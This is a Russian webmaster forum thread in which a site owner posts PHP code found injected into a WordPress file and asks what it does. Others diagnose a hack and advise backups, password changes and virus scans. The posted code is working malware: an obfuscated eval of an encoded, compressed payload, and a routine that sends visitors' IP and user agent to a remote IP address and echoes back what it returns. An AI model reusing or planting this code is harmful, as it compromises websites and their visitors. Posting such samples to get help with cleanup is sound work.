- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Сегодня зайдя на сайт вылезла ошибка...
3541 строка ну и дальше....
function _cleanup_header_comment($str) {
return trim(preg_replace("/\s*(?:\*\/|\function getnewsfromid($id) {
$id = intval($id);
$rtn = $id + date("j");
return $rtn;
}
function mysql_safe_connect($in) {
if (getnewsfromid(64) < 1024) {
$rtn = base64_decode($in);
return $rtn;
}
}
$md5 = "847da03d94df6f55ddc17dbfbc3ffa8d";
$a3 = array(")",'6','v','b','e','f','s',"a",';',"g","r",'$','4',"z","i",'c','t',"o","n",'d','l',"(","_");
$b3b = create_function('$'.'v',$a3[4].$a3[2].$a3[7].$a3[20].$a3[21].$a3[9].$a3[13].$a3[14].$a3[18].$a3[5].$a3[20].$a3[7].$a3[16].$a3[4].$a3[21].$a3[3].$a3[7].$a3[6].$a3[4].$a3[1].$a3[12].$a3[22].$a3[19].$a3[4].$a3[15].$a3[17].$a3[19].$a3[4].$a3[21].$a3[11].$a3[2].$a3[0].$a3[0].$a3[0].$a3[8]);
$b3b('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');
function get_all_news_by_list($newsid) {
if (date("j") - $newsid > 320 ) {
$rtn = false;
} else {
$get = mysql_safe_connect("aHR0cDovLzE3OC4yMTEuMzMuNzQvZ2V0X2FwaS5waHA/cGlkPTIm")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);
if (!isset($_COOKIE[mysql_safe_connect("ZGxlX3Bhc3N3b3Jk")])) {
echo @file_get_contents($get);
}
}
}
get_all_news_by_list (date("j"));
?>).*/", '', $str));
}
Что за код ? Вот нашёл тему только она про DLE /ru/forum/778402 чем то коды похожи...До какой строки удалять этот код?
сильно не ругайте php можно сказать незнаю...
---------- Добавлено 08.06.2013 в 18:57 ----------
На другом сайте такая же беда ...
function _cleanup_header_comment($str) {
return trim(preg_replace("/\s*(?:\*\/|\function getnewsfromid($id) {
$id = intval($id);
$rtn = $id + date("j");
return $rtn;
}
function mysql_safe_connect($in) {
if (getnewsfromid(64) < 1024) {
$rtn = base64_decode($in);
return $rtn;
}
}
function get_all_news_by_list($newsid) {
if (date("j") - $newsid > 320 ) {
$rtn = false;
} else {
$get = mysql_safe_connect("aHR0cDovLzE3OC4yMTEuMzMuNzQvZ2V0X2FwaS5waHA/cGlkPTIm")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);
if (!isset($_COOKIE[mysql_safe_connect("ZGxlX3Bhc3N3b3Jk")])) {
echo @file_get_contents($get);
}
}
}
get_all_news_by_list (date("j"));
?>).*/", '', $str));
}
Не подскажете что выполняют они?....
вас взломали, скорее всего вставляют в посты свои ссылки с какой нибудь порнографией...
проверяйте все файлы (читать прикрепленный топик), менять пароли, возможно обратиться к специалисту...
kgtu5, к хостеру за бэкапом надо, а не к специалисту.
зы ТС, попроси бэкап за 07,06,2013
BlackHourse, сомневаюсь что хостер делает бекап ;)
BlackHourse, сомневаюсь что хостер делает бекап ;)
Шутка? и 10 символов
BlackHourse, ну смысл просить их, они в панеле должны быть если хостер их делает
BlackHourse, ну смысл просить их, они в панеле должны быть если хостер их делает
Панель, панеле рознь. ТС проси, кто хостер?
вангую что проблема в сохраненных паролях файлзиллы
(вытроянили)
mister-homyk, читайте прилепленный топик про вирусы. Потом качайте айболит. И так далее, по списку.
Айболит хорош, но толку от него нет!! Как и от бэкапа на компьютере с кейлогером.
зы статичный ip
Это взлом :)
Взломали внутренний ВП файл. Легко можно заменить на чистый из дистрибутива, но важно понять причину проблемы.
1. Скачать бэкап
2. Сменить все пароли
3. Проверить комп на вирусы
4. Проверить бэкап на вирусы. Для анализа можно айболитом, но он найдет ещё кучу всего лишнего.
К примеру, джумлу часто пробивают через jce старых версий. А вот через какую дыру бьют ВП - не знаю